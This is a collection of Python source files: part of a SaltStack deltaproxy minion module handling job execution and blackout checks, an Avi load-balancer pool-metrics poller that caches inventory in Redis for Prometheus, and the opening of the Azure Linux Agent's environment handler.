                # this minion is blacked out. Only allow saltutil.refresh_pillar
                # and the whitelist
                if (
                    function_name != "saltutil.refresh_pillar"
                    and function_name not in whitelist
                ):
                    minion_blackout_violation = True
            # use minion_blackout_whitelist from grains if it exists
            if minion_instance.opts["grains"].get("minion_blackout", False):
                whitelist = minion_instance.opts["grains"].get(
                    "minion_blackout_whitelist", []
                )
                if (
                    function_name != "saltutil.refresh_pillar"
                    and function_name not in whitelist
                ):
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError(
                    'Minion in blackout mode. Set "minion_blackout" '
                    "to False in pillar or grains to resume operations. Only "
                    "saltutil.refresh_pillar allowed in blackout mode."
                )

            if function_name in minion_instance.functions:
                func = minion_instance.functions[function_name]
                args, kwargs = salt.minion.load_args_and_kwargs(func, data["arg"], data)
            else:
                # only run if function_name is not in minion_instance.functions
                # and allow_missing_funcs is True
                func = function_name
                args, kwargs = data["arg"], data

            minion_instance.functions.pack["__context__"]["retcode"] = 0
            minion_instance.functions.pack["__opts__"] = opts

            # Normalize and validate the executors specification.
            if isinstance(executors, str):
                executors = [executors]
            elif not isinstance(executors, list) or not executors:
                raise SaltInvocationError(
                    "Wrong executors specification: {}. String or non-empty list expected".format(
                        executors
                    )
                )
            if opts.get("sudo_user", "") and executors[-1] != "sudo":
                executors[-1] = "sudo"  # replace the last one with sudo
            log.debug("Executors list %s", executors)

            # Run the chain until an executor produces a non-None result.
            for name in executors:
                fname = "{}.execute".format(name)
                if fname not in minion_instance.executors:
                    raise SaltInvocationError(
                        "Executor '{}' is not available".format(name)
                    )
                return_data = minion_instance.executors[fname](
                    opts, data, func, args, kwargs
                )
                if return_data is not None:
                    break

            if isinstance(return_data, types.GeneratorType):
                # Streamed results: fire progress events per chunk; merge dict
                # chunks, otherwise accumulate a list.
                ind = 0
                iret = {}
                for single in return_data:
                    if isinstance(single, dict) and isinstance(iret, dict):
                        iret.update(single)
                    else:
                        if not iret:
                            iret = []
                        iret.append(single)
                    tag = tagify([data["jid"], "prog", opts["id"], str(ind)], "job")
                    event_data = {"return": single}
                    minion_instance._fire_master(event_data, tag)
                    ind += 1
                ret["return"] = iret
            else:
                ret["return"] = return_data

            retcode = minion_instance.functions.pack["__context__"].get(
                "retcode", salt.defaults.exitcodes.EX_OK
            )
            if retcode == salt.defaults.exitcodes.EX_OK:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(
                        return_data.get(x, True) for x in ("result", "success")
                    )
                except Exception:  # pylint: disable=broad-except
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = salt.defaults.exitcodes.EX_GENERIC
            ret["retcode"] = retcode
            ret["success"] = retcode == salt.defaults.exitcodes.EX_OK
        except CommandNotFoundError as exc:
            msg = 'Command required for "{}" not found'.format(function_name)
            log.debug(msg, exc_info=True)
            ret["return"] = "{}: {}".format(msg, exc)
            ret["out"] = "nested"
            ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
        except CommandExecutionError as exc:
            log.error(
                'A command in "%s" had a problem: %s',
                function_name,
                exc,
                exc_info_on_loglevel=logging.DEBUG,
            )
            ret["return"] = "ERROR: {}".format(exc)
            ret["out"] = "nested"
            ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
        except SaltInvocationError as exc:
            log.error(
                'Problem executing "%s": %s',
                function_name,
                exc,
                exc_info_on_loglevel=logging.DEBUG,
            )
            ret["return"] = 'ERROR executing "{}": {}'.format(function_name, exc)
            ret["out"] = "nested"
            ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
        except TypeError as exc:
            # Bad args/kwargs: include the function's docstring to help the user.
            msg = "Passed invalid arguments to {}: {}\n{}".format(
                function_name, exc, func.__doc__ or ""
            )
            log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
            ret["return"] = msg
            ret["out"] = "nested"
            ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
        except Exception:  # pylint: disable=broad-except
            msg = "The minion function caused an exception"
            log.warning(msg, exc_info=True)
            salt.utils.error.fire_exception(
                salt.exceptions.MinionError(msg), opts, job=data
            )
            ret["return"] = "{}: {}".format(msg, traceback.format_exc())
            ret["out"] = "nested"
            ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
    else:
        # Unknown function: return docs for near matches, or a missing-function
        # message (with possible load errors for the module).
        docs = minion_instance.functions["sys.doc"]("{}*".format(function_name))
        if docs:
            docs[function_name] = minion_instance.functions.missing_fun_string(
                function_name
            )
            ret["return"] = docs
        else:
            ret["return"] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split(".")[0]
            if mod_name in minion_instance.function_errors:
                ret["return"] += ' Possible reasons: "{}"'.format(
                    minion_instance.function_errors[mod_name]
                )
        ret["success"] = False
        ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
        ret["out"] = "nested"

    ret["jid"] = data["jid"]
    ret["fun"] = data["fun"]
    ret["fun_args"] = data["arg"]
    if "master_id" in data:
        ret["master_id"] = data["master_id"]
    if "metadata" in data:
        if isinstance(data["metadata"], dict):
            ret["metadata"] = data["metadata"]
        else:
            log.warning("The metadata parameter must be a dictionary. Ignoring.")
    if minion_instance.connected:
        minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())

    # Add default returners from minion config
    # Should have been converted to comma-delimited string already
    if isinstance(opts.get("return"), str):
        if data["ret"]:
            data["ret"] = ",".join((data["ret"], opts["return"]))
        else:
            data["ret"] = opts["return"]

    # TODO: make a list? Seems odd to split it this late :/
    if data["ret"] and isinstance(data["ret"], str):
        if "ret_config" in data:
            ret["ret_config"] = data["ret_config"]
        if "ret_kwargs" in data:
            ret["ret_kwargs"] = data["ret_kwargs"]
        ret["id"] = opts["id"]
        for returner in set(data["ret"].split(",")):
            try:
                returner_str = "{}.returner".format(returner)
                if returner_str in minion_instance.returners:
                    minion_instance.returners[returner_str](ret)
                else:
                    returner_err = minion_instance.returners.missing_fun_string(
                        returner_str
                    )
                    log.error(
                        "Returner %s could not be loaded: %s",
                        returner_str,
                        returner_err,
                    )
            except Exception as exc:  # pylint: disable=broad-except
                log.exception("The return failed for job %s: %s", data["jid"], exc)
def thread_multi_return(cls, minion_instance, opts, data):
    """
    This method should be used as a threading target, start the actual
    minion side execution.

    Multi-function variant: ``data['fun']`` is a sequence of function
    names and ``data['arg']`` the matching argument lists. Each function
    is executed in turn, per-function return/retcode/success values are
    collected into ``ret``, the aggregate is published back to the
    master, and finally handed to any configured returners.
    """
    # Job metadata file under the minion's proc dir, keyed by job id.
    fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
    if opts["multiprocessing"] and not salt.utils.platform.is_windows():
        # Shutdown the multiprocessing before daemonizing
        salt.log.setup.shutdown_multiprocessing_logging()
        salt.utils.process.daemonize_if(opts)
        # Reconfigure multiprocessing logging after daemonizing
        salt.log.setup.setup_multiprocessing_logging()
    salt.utils.process.appendproctitle(
        "{}._thread_multi_return {}".format(cls.__name__, data["jid"])
    )
    # Persist the executing PID together with the job data so job-lookup
    # utilities can find this process.
    sdata = {"pid": os.getpid()}
    sdata.update(data)
    log.info("Starting a new job with PID %s", sdata["pid"])
    with salt.utils.files.fopen(fn_, "w+b") as fp_:
        fp_.write(salt.payload.dumps(sdata))
    # multifunc_ordered: results are positional lists (index == function
    # position); otherwise results are dicts keyed by function name.
    multifunc_ordered = opts.get("multifunc_ordered", False)
    num_funcs = len(data["fun"])
    if multifunc_ordered:
        ret = {
            "return": [None] * num_funcs,
            "retcode": [None] * num_funcs,
            "success": [False] * num_funcs,
        }
    else:
        ret = {"return": {}, "retcode": {}, "success": {}}
    for ind in range(0, num_funcs):
        if not multifunc_ordered:
            ret["success"][data["fun"][ind]] = False
        try:
            minion_blackout_violation = False
            # Blackout can come from pillar (only when connected) or grains.
            if minion_instance.connected and minion_instance.opts["pillar"].get(
                "minion_blackout", False
            ):
                whitelist = minion_instance.opts["pillar"].get(
                    "minion_blackout_whitelist", []
                )
                # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                if (
                    data["fun"][ind] != "saltutil.refresh_pillar"
                    and data["fun"][ind] not in whitelist
                ):
                    minion_blackout_violation = True
            elif minion_instance.opts["grains"].get("minion_blackout", False):
                whitelist = minion_instance.opts["grains"].get(
                    "minion_blackout_whitelist", []
                )
                if (
                    data["fun"][ind] != "saltutil.refresh_pillar"
                    and data["fun"][ind] not in whitelist
                ):
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError(
                    'Minion in blackout mode. Set "minion_blackout" '
                    "to False in pillar or grains to resume operations. Only "
                    "saltutil.refresh_pillar allowed in blackout mode."
                )
            func = minion_instance.functions[data["fun"][ind]]
            args, kwargs = salt.minion.load_args_and_kwargs(
                func, data["arg"][ind], data
            )
            # Reset the shared retcode before each call; the executed
            # function may set it via __context__.
            minion_instance.functions.pack["__context__"]["retcode"] = 0
            key = ind if multifunc_ordered else data["fun"][ind]
            ret["return"][key] = func(*args, **kwargs)
            retcode = minion_instance.functions.pack["__context__"].get("retcode", 0)
            if retcode == 0:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(
                        ret["return"][key].get(x, True) for x in ("result", "success")
                    )
                except Exception:  # pylint: disable=broad-except
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = 1
            ret["retcode"][key] = retcode
            ret["success"][key] = retcode == 0
        except Exception as exc:  # pylint: disable=broad-except
            # Store the traceback as this function's return so the failure
            # is visible to the caller; continue with the next function.
            trb = traceback.format_exc()
            log.warning("The minion function caused an exception: %s", exc)
            if multifunc_ordered:
                ret["return"][ind] = trb
            else:
                ret["return"][data["fun"][ind]] = trb
    ret["jid"] = data["jid"]
    ret["fun"] = data["fun"]
    ret["fun_args"] = data["arg"]
    if "metadata" in data:
        ret["metadata"] = data["metadata"]
    if minion_instance.connected:
        minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
    # Hand the result to each configured returner (comma-delimited list).
    if data["ret"]:
        if "ret_config" in data:
            ret["ret_config"] = data["ret_config"]
        if "ret_kwargs" in data:
            ret["ret_kwargs"] = data["ret_kwargs"]
        for returner in set(data["ret"].split(",")):
            ret["id"] = opts["id"]
            try:
                minion_instance.returners["{}.returner".format(returner)](ret)
            except Exception as exc:  # pylint: disable=broad-except
                log.error("The return failed for job %s: %s", data["jid"], exc)
def handle_payload(self, payload):
    """
    Verify the publication and then pass
    the payload along to _handle_decoded_payload.

    The load is offered first to the "control" proxy and then to every
    sub-proxy that the publication targets.
    """
    is_aes = payload is not None and payload["enc"] == "aes"
    if is_aes:
        load = payload["load"]
        # First handle payload for the "control" proxy
        if self._target_load(load):
            self._handle_decoded_payload(load)
        # The following handles the sub-proxies
        for sub_id in self.opts["proxy"].get("ids", [self.opts["id"]]):
            sub_proxy = self.deltaproxy_objs[sub_id]
            if sub_proxy._target_load(load):
                sub_proxy._handle_decoded_payload(load)
    elif self.opts["zmq_filtering"]:
        # With filtering enabled we'd like to know when the minion sees
        # something it shouldn't.
        log.trace(
            "Broadcast message received not for this minion, Load: %s", payload["load"]
        )
    # If it's not AES, and thus has not been verified, we do nothing.
    # In the future, we could add support for some clearfuncs, but
    # the minion currently has no need.
def handle_decoded_payload(self, data):
    """
    Override this method if you wish to handle the decoded data
    differently.

    This is a generator-based (tornado) coroutine: note the ``yield``
    below, used to wait for a free process slot before dispatching the
    job to a subprocess or thread.
    """
    if "user" in data:
        log.info(
            "User %s Executing command %s with jid %s",
            data["user"],
            data["fun"],
            data["jid"],
        )
    else:
        log.info("Executing command %s with jid %s", data["fun"], data["jid"])
    log.debug("Command details %s", data)

    # Don't duplicate jobs
    log.trace("Started JIDs: %s", self.jid_queue)
    if self.jid_queue is not None:
        if data["jid"] in self.jid_queue:
            return
        else:
            self.jid_queue.append(data["jid"])
            # Bound the JID queue to the configured high-water mark.
            if len(self.jid_queue) > self.opts["minion_jid_queue_hwm"]:
                self.jid_queue.pop(0)

    if isinstance(data["fun"], str):
        if data["fun"] == "sys.reload_modules":
            (
                self.functions,
                self.returners,
                self.function_errors,
                self.executors,
            ) = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    # Throttle job dispatch when a maximum process count is configured.
    process_count_max = self.opts.get("process_count_max")
    if process_count_max > 0:
        process_count = self.subprocess_list.count
        once_logged = False
        while process_count >= process_count_max:
            if once_logged is False:
                log.debug(
                    "Maximum number of processes reached while executing jid %s, waiting...",
                    data["jid"],
                )
                once_logged = True
            yield tornado.gen.sleep(0.5)
            process_count = self.subprocess_list.count

    # We stash an instance references to allow for the socket
    # communication in Windows. You can't pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    multiprocessing_enabled = self.opts.get("multiprocessing", True)
    # NOTE(review): ``target`` is expected to be bound in the enclosing
    # scope (the thread_return/thread_multi_return dispatcher) -- confirm.
    if multiprocessing_enabled:
        if sys.platform.startswith("win"):
            # let python reconstruct the minion on the other side if we're
            # running on windows
            instance = None
        # BUG FIX: pass self.opts rather than instance.opts -- on Windows
        # `instance` is None here, so `instance.opts` raised
        # AttributeError before the job process could even start.
        process = SignalHandlingProcess(
            target=target, args=(self, instance, self.opts, data, self.connected)
        )
    else:
        process = threading.Thread(
            target=target,
            args=(self, instance, self.opts, data, self.connected),
            name=data["jid"],
        )
    process.start()
    process.name = "{}-Job-{}".format(process.name, data["jid"])
    self.subprocess_list.add(process)
def target_load(self, load):
    """
    Verify that the publication is valid.

    Returns True only when the load carries all required fields and the
    appropriate matcher says this minion is targeted.
    """
    # A valid publication must carry all four of these fields.
    for required_field in ("tgt", "jid", "fun", "arg"):
        if required_field not in load:
            return False
    # Verify that the publication applies to this minion.
    # The master does some pre-processing to determine which minions get
    # a request (e.g. 'salt -G "grain_key:grain_val" test.ping' is
    # pre-filtered on the master), so this minion should not see a
    # publication the master did not address to it.
    if "tgt_type" not in load:
        return bool(self.matchers["glob_match.match"](load["tgt"], opts=self.opts))
    match_func = self.matchers.get("{}_match.match".format(load["tgt_type"]), None)
    if match_func is None:
        return False
    if load["tgt_type"] in ("grain", "grain_pcre", "pillar"):
        delimiter = load.get("delimiter", DEFAULT_TARGET_DELIM)
        return bool(match_func(load["tgt"], delimiter=delimiter, opts=self.opts))
    return bool(match_func(load["tgt"], opts=self.opts))
# Main Minion Tune In
def tune_in(self, start=True):
    """
    Lock onto the publisher. This is the main event loop for the minion
    :rtype : None
    """
    # Bring every managed sub-proxy up to a running state before the
    # control proxy enters the shared event loop.
    for _proxy_minion in self.deltaproxy_objs.values():
        _proxy_minion.setup_scheduler()
        _proxy_minion.setup_beacons()
        _proxy_minion._state_run()
    super(ProxyMinion, self).tune_in(start=start)
|
pool_static.py | import json, requests, urllib3
from flask import Flask, request, jsonify
from datetime import datetime
import time
import traceback
import os
import redis
import cPickle as pickle
from multiprocessing import Process
def avi_request(avi_api, tenant, api_version='17.2.1'):
    """GET *avi_api* from the Avi controller REST API for *tenant*.

    Uses the module-level ``login`` session cookies and ``avi_controller``
    address. Returns the ``requests`` response object.
    """
    # Newer controllers use 'avi-sessionid'; fall back to 'sessionid'.
    if 'avi-sessionid' in login.cookies.keys():
        session_cookies = {'avi-sessionid': login.cookies['avi-sessionid']}
    else:
        session_cookies = {'sessionid': login.cookies['sessionid']}
    request_headers = {
        'X-Avi-Tenant': '%s' % tenant,
        'content-type': 'application/json',
        'X-Avi-Version': '%s' % api_version,
    }
    url = 'https://%s/api/%s' % (avi_controller, avi_api)
    return requests.get(url, verify=False, headers=request_headers,
                        cookies=session_cookies, timeout=50)
def avi_post(api_url, tenant, payload, api_version='17.2.1'):
    """POST *payload* (JSON-encoded) to *api_url* on the Avi controller.

    Uses the module-level ``login`` session cookies and ``avi_controller``
    address; includes the CSRF token required for write operations.
    Returns the ``requests`` response object.
    """
    # Newer controllers use 'avi-sessionid'; fall back to 'sessionid'.
    if 'avi-sessionid' in login.cookies.keys():
        session_cookies = {'avi-sessionid': login.cookies['avi-sessionid']}
    else:
        session_cookies = {'sessionid': login.cookies['sessionid']}
    request_headers = {
        "X-Avi-Tenant": "%s" % tenant,
        'content-type': 'application/json',
        'referer': 'https://%s' % avi_controller,
        'X-CSRFToken': dict(login.cookies)['csrftoken'],
        'X-Avi-Version': '%s' % api_version,
    }
    session_cookies['csrftoken'] = login.cookies['csrftoken']
    url = 'https://%s/api/%s' % (avi_controller, api_url)
    return requests.post(url, verify=False, headers=request_headers,
                         cookies=session_cookies, data=json.dumps(payload), timeout=50)
def pool_inventory_multiprocess(r, cloud_list, uuid_list, tenant_list):
    """Refresh the pool inventory cache in Redis.

    Spawns one ``pool_inventory_child`` process per tenant (joined in
    batches of ~10), then consolidates the per-tenant
    ``temp_pool_dict_*`` keys into a single pickled ``pool_dict`` plus
    per-tenant pool counts in ``pool_results``.

    r           -- redis client
    cloud_list  -- clouds to include ('*' for all)
    uuid_list   -- pool uuids to include ('*' for all)
    tenant_list -- tenants to poll
    """
    try:
        pool_inventory_cache_start = time.time()
        pool_dict = {}
        proc = []
        for t in tenant_list:
            p = Process(target=pool_inventory_child, args=(r, cloud_list, uuid_list, tenant_list, t,))
            p.start()
            proc.append(p)
            # Throttle: never let more than ~10 tenant pollers run at once.
            if len(proc) > 10:
                for p in proc:
                    p.join()
                proc = []
        for p in proc:
            p.join()
        #----- get keys, consolidate then delete
        inv_keys = r.keys('temp_pool_dict_*')
        pool_dict = {}
        for k in inv_keys:
            _1 = pickle.loads(r.get(k))
            pool_dict.update(_1)
            r.delete(k)
        # Summarize: total pool count plus a per-tenant count.
        pool_results = {}
        pool_results['TOTAL_POOLS'] = len(pool_dict)
        for p in pool_dict:
            if pool_dict[p]['tenant'] not in pool_results:
                pool_results[pool_dict[p]['tenant']] = 1
            else:
                pool_results[pool_dict[p]['tenant']] += 1
        r.set('pool_results', pickle.dumps(pool_results))
        r.set('pool_dict', pickle.dumps(pool_dict))
        temp_total_time = str(time.time()-pool_inventory_cache_start)
        print(str(datetime.now())+' =====> Refresh of Pool Inventory Cache took %s seconds' %temp_total_time)
    # BUG FIX: narrowed from bare `except:`, which also swallowed
    # SystemExit/KeyboardInterrupt and made the poller uninterruptible.
    except Exception:
        print(str(datetime.now())+' '+avi_controller+': func pool_inventory_multiprocess encountered an error')
        exception_text = traceback.format_exc()
        print(str(datetime.now())+' : '+exception_text)
def pool_inventory_child(r, cloud_list, uuid_list, tenant_list, t):
    """Poll the pool inventory for a single tenant *t*.

    Pages through the controller's pool list, filters by tenant/cloud/uuid,
    and stores the resulting dict in Redis under ``temp_pool_dict_<t>`` for
    ``pool_inventory_multiprocess`` to consolidate.
    """
    try:
        pool_inventory_cache_start = time.time()
        pool_inv = avi_request('pool?fields=cloud_ref,tenant_ref&page_size=200&include_name=true', t)
        if pool_inv.status_code == 403:
            print(str(datetime.now())+' =====> ERROR pool_inventory_child: %s' %pool_inv.text)
        else:
            pool_inv = pool_inv.json()
            resp = pool_inv
            page_number = 1
            pool_dict = {}
            # Follow API pagination, folding every page into pool_inv['results'].
            while 'next' in resp:
                page_number += 1
                resp = avi_request('pool?fields=cloud_ref,tenant_ref&page_size=200&include_name=true&page='+str(page_number), t).json()
                for p in resp['results']:
                    pool_inv['results'].append(p)
            if pool_inv['count'] > 0:
                for p in pool_inv['results']:
                    # Refs look like '<url>#<name>'; the name follows the '#'.
                    if p['tenant_ref'].rsplit('#')[1] in tenant_list:
                        if p['cloud_ref'].rsplit('#')[1].lower() in cloud_list or '*' in cloud_list:
                            if p['uuid'] in uuid_list or '*' in uuid_list:
                                if p['uuid'] not in pool_dict:
                                    pool_dict[p['uuid']] = {}
                                    pool_dict[p['uuid']]['name'] = p['name']
                                    pool_dict[p['uuid']]['tenant'] = p['tenant_ref'].rsplit('#')[1]
                                    pool_dict[p['uuid']]['cloud'] = p['cloud_ref'].rsplit('#')[1]
                                else:
                                    # Duplicate uuid across tenants: prefer 'admin'.
                                    if p['tenant_ref'].rsplit('#')[1] == 'admin':
                                        pool_dict[p['uuid']]['tenant'] = 'admin'
            r.set('temp_pool_dict_'+t, pickle.dumps(pool_dict))
            temp_total_time = str(time.time()-pool_inventory_cache_start)
            print(str(datetime.now())+' =====> Refresh of Pool Inventory Cache took %s seconds for tenant %s' %(temp_total_time,t))
    # BUG FIX: narrowed from bare `except:` so SystemExit/KeyboardInterrupt
    # are no longer swallowed.
    except Exception:
        print(str(datetime.now())+' '+avi_controller+': func pool_inventory_child encountered an error')
        exception_text = traceback.format_exc()
        print(str(datetime.now())+' : '+exception_text)
def pool_metrics_multiprocess(r, uuid_list, pool_metric_list, tenant_list):
    """Refresh the pool metrics cache in Prometheus text format.

    Spawns one ``pool_metrics_child`` per tenant (joined in batches),
    consolidates the raw ``temp_pool_stat_*`` responses, and renders one
    '# HELP' / '# TYPE' / sample group per metric into the Redis key
    ``pool_metrics``. Also records pools with no samples this cycle in
    ``pool_missing_metrics``. Returns False on error, None otherwise.
    """
    try:
        discovered_servers = []
        metric_resp = []
        print(str(datetime.now())+' =====> Refreshing Pool Static Metrics Cache')
        pool_static_metric_cache_start = time.time()
        pool_dict = pickle.loads(r.get('pool_dict'))
        proc = []
        for t in tenant_list:
            p = Process(target=pool_metrics_child, args=(r, uuid_list, pool_metric_list, pool_dict, t,))
            p.start()
            proc.append(p)
            # Throttle: join in batches so no more than ~10 children run at once.
            if len(proc) > 10:
                for p in proc:
                    p.join()
                proc = []
        for p in proc:
            p.join()
        metric_keys = r.keys('temp_pool_stat_*')
        for k in metric_keys:
            _1 = pickle.loads(r.get(k))
            metric_resp.append(_1['series']['collItemRequest:AllServers'])
            r.delete(k)
        prom_metrics = ['\n']
        for _resp in metric_resp:
            for p in _resp:
                # Series keys look like '<prefix>,<pool_uuid>,<server>'.
                if p.split(',')[1] in pool_dict:
                    if p not in discovered_servers:
                        discovered_servers.append(p)
                    for m in _resp[p]:
                        if 'data' in m:
                            temp_tags = ''
                            metric_name = m['header']['name'].replace('.','_').replace('-','_')
                            metric_description = m['header']['metric_description']
                            metric_value = m['data'][0]['value']
                            # Prometheus labels for this sample.
                            temp_payload = {}
                            temp_payload['name'] = pool_dict[p.split(',')[1]]['name']
                            temp_payload['uuid'] = p.split(',')[1]
                            temp_payload['server'] = p.split(',')[2]
                            temp_payload['cloud'] = pool_dict[p.split(',')[1]]['cloud']
                            temp_payload['tenant'] = m['header']['tenant_ref'].rsplit('#')[1]
                            temp_payload['entity_type'] = 'pool'
                            for e in temp_payload:
                                temp_tags = temp_tags+(str(e+'="'+temp_payload[e]+'",'))
                            temp_tags = '{'+temp_tags.rstrip(',')+'}'
                            # The ' 01'/' 02' markers force '# HELP' to sort
                            # before '# TYPE' before the samples within each
                            # metric group; they are stripped again below.
                            prom_metrics.append('%s 01# HELP %s %s' %(metric_name,metric_name, metric_description))
                            prom_metrics.append('%s 02# TYPE %s gauge' %(metric_name,metric_name))
                            prom_metrics.append('%s %s %s' %(metric_name,temp_tags,str(metric_value)))
        # De-duplicate, then sort so each metric's HELP/TYPE/samples group up.
        prom_metrics = list(set(prom_metrics))
        prom_metrics = sorted(prom_metrics)
        # Strip the ordering markers, leaving plain '# HELP'/'# TYPE' lines.
        for idx, item in enumerate(prom_metrics):
            if '01#' in item:
                item = item.split('01',1)[1]
                prom_metrics[idx] = item
            elif '02#' in item:
                item = item.split('02',1)[1]
                prom_metrics[idx] = item
        prom_metrics.append('\n')
        _pool_metrics = '\n'.join(prom_metrics)
        r.set('pool_polling', 'False')
        # Record pools that produced no samples this cycle.
        missing_metrics = []
        for _p in pool_dict:
            if pool_dict[_p]['name'] not in _pool_metrics:
                _a = pool_dict[_p]['tenant']+' : '+pool_dict[_p]['name']
                missing_metrics.append(_a)
        r.set('pool_missing_metrics', pickle.dumps(missing_metrics))
        r.set('pool_metrics', pickle.dumps(prom_metrics))
        temp_total_time = str(time.time()-pool_static_metric_cache_start)
        print(str(datetime.now())+' =====> Refresh of Pool Metrics Cache took %s seconds' %temp_total_time)
    # BUG FIX: narrowed from bare `except:` so SystemExit/KeyboardInterrupt
    # are no longer swallowed.
    except Exception:
        r.set('pool_polling', 'False')
        print(str(datetime.now())+' '+avi_controller+': func pool_metrics_multiprocess encountered an error')
        exception_text = traceback.format_exc()
        print(str(datetime.now())+' '+avi_controller+': '+exception_text)
        return False
def pool_metrics_child(r, uuid_list, pool_metric_list, pool_dict, t):
    """Pull per-server pool metrics for tenant *t* from the controller.

    Builds a metrics-collection request restricted to this tenant's pool
    uuids ('*' for all) and stores the raw JSON response in Redis under
    ``temp_pool_stat_<t>`` for ``pool_metrics_multiprocess`` to render.
    """
    try:
        pool_static_metric_cache_start = time.time()
        if '*' in uuid_list:
            entity_uuid = '*'
        else:
            # Only request uuids that belong to this tenant.
            _temp_uuid_list = []
            for e in uuid_list:
                if pool_dict[e]['tenant'] == t:
                    _temp_uuid_list.append(e)
            entity_uuid = ','.join(_temp_uuid_list)
        payload = {
            "metric_requests": [
                {
                    "step": 300,
                    "limit": 1,
                    "aggregate_entity": False,
                    "entity_uuid": "*",
                    "obj_id": "*",
                    "pool_uuid": entity_uuid,
                    "id": "collItemRequest:AllServers",
                    "metric_id": pool_metric_list
                }
            ]}
        pool_stat = avi_post('analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true', t, payload).json()
        r.set('temp_pool_stat_'+t, pickle.dumps(pool_stat))
        temp_total_time = str(time.time()-pool_static_metric_cache_start)
        print(str(datetime.now())+' =====> Refresh of Pool Metrics Cache took %s seconds for tenant %s' %(temp_total_time,t))
    # BUG FIX: narrowed from bare `except:` so SystemExit/KeyboardInterrupt
    # are no longer swallowed.
    except Exception:
        print(str(datetime.now())+' : func pool_metrics_child encountered an error for tenant: '+t)
        exception_text = traceback.format_exc()
        print(str(datetime.now())+' : '+exception_text)
def refresh_pool_metrics(r, avi_login, controller):
    """Entry point: refresh pool inventory and metrics caches.

    Binds the module-level ``login`` session and ``avi_controller``
    address, reads the polling configuration out of Redis, then runs the
    inventory and metrics refresh passes, time-stamping start and end.
    """
    try:
        global login
        login = avi_login
        global avi_controller
        avi_controller = controller
        r.set('pool_last_poll_start_time', time.time())
        #--- polling configuration is stored pickled in redis
        cloud_list = list(pickle.loads(r.get('pool_cloud')))
        #---
        _uuid_list = pickle.loads(r.get('pool_entity_uuid'))
        if '*' in _uuid_list:
            # A wildcard collapses the whole list to the string '*'.
            uuid_list = '*'
        else:
            uuid_list = list(_uuid_list)
        #---
        tenant_list = list(pickle.loads(r.get('pool_tenant')))
        #--- metric ids are sent to the API as one comma-delimited string
        pool_metric_list = ','.join(list(pickle.loads(r.get('pool_metric_id'))))
        #---
        pool_inventory_multiprocess(r, cloud_list, uuid_list, tenant_list)
        pool_metrics_multiprocess(r, uuid_list, pool_metric_list, tenant_list)
        r.set('pool_last_poll_time', time.time())
    except:
        exception_text = traceback.format_exc()
        print(str(datetime.now())+' : '+exception_text)
|
env.py | # Microsoft Azure Linux Agent
#
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import re
import os
import socket
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.dhcp import get_dhcp_handler
from azurelinuxagent.common.event import add_periodic, WALAEventOperation
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils.archive import StateArchiver
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
# Filename patterns of goal-state files cached in the agent lib dir:
# "<name>.<incarnation>.<extension>". Raw strings make the backslashes
# literal regex escapes, which also removes the need for the previous
# `# pylint: disable=W1401` (anomalous-backslash) suppressions.
CACHE_PATTERNS = [
    re.compile(r"^(.*)\.(\d+)\.(agentsManifest)$", re.IGNORECASE),
    re.compile(r"^(.*)\.(\d+)\.(manifest\.xml)$", re.IGNORECASE),
    re.compile(r"^(.*)\.(\d+)\.(xml)$", re.IGNORECASE)
]

# Upper bound on the number of cached goal-state files kept around.
MAXIMUM_CACHED_FILES = 50
def get_env_handler():
    """Create and return a new EnvHandler instance."""
    return EnvHandler()
class EnvHandler(ThreadHandlerInterface):  # pylint: disable=R0902
    """
    Monitor changes to dhcp and hostname.
    If dhcp client process re-start has occurred, reset routes, dhcp with fabric.

    Monitor scsi disk.
    If new scsi disk found, set timeout
    """

    _THREAD_NAME = "EnvHandler"

    @staticmethod
    def get_thread_name():
        return EnvHandler._THREAD_NAME

    def __init__(self):
        self.osutil = get_osutil()
        self.dhcp_handler = get_dhcp_handler()
        self.protocol_util = None
        self._protocol = None
        self.stopped = True
        self.hostname = None
        self.dhcp_id_list = []
        self.server_thread = None
        self.dhcp_warning_enabled = True
        self.archiver = StateArchiver(conf.get_lib_dir())
        self._reset_firewall_rules = False
        # Always-on periodic operations; config-dependent ones are
        # appended conditionally below.
        self._periodic_operations = [
            PeriodicOperation("_remove_persistent_net_rules", self._remove_persistent_net_rules_period, conf.get_remove_persistent_net_rules_period()),
            PeriodicOperation("_monitor_dhcp_client_restart", self._monitor_dhcp_client_restart, conf.get_monitor_dhcp_client_restart_period()),
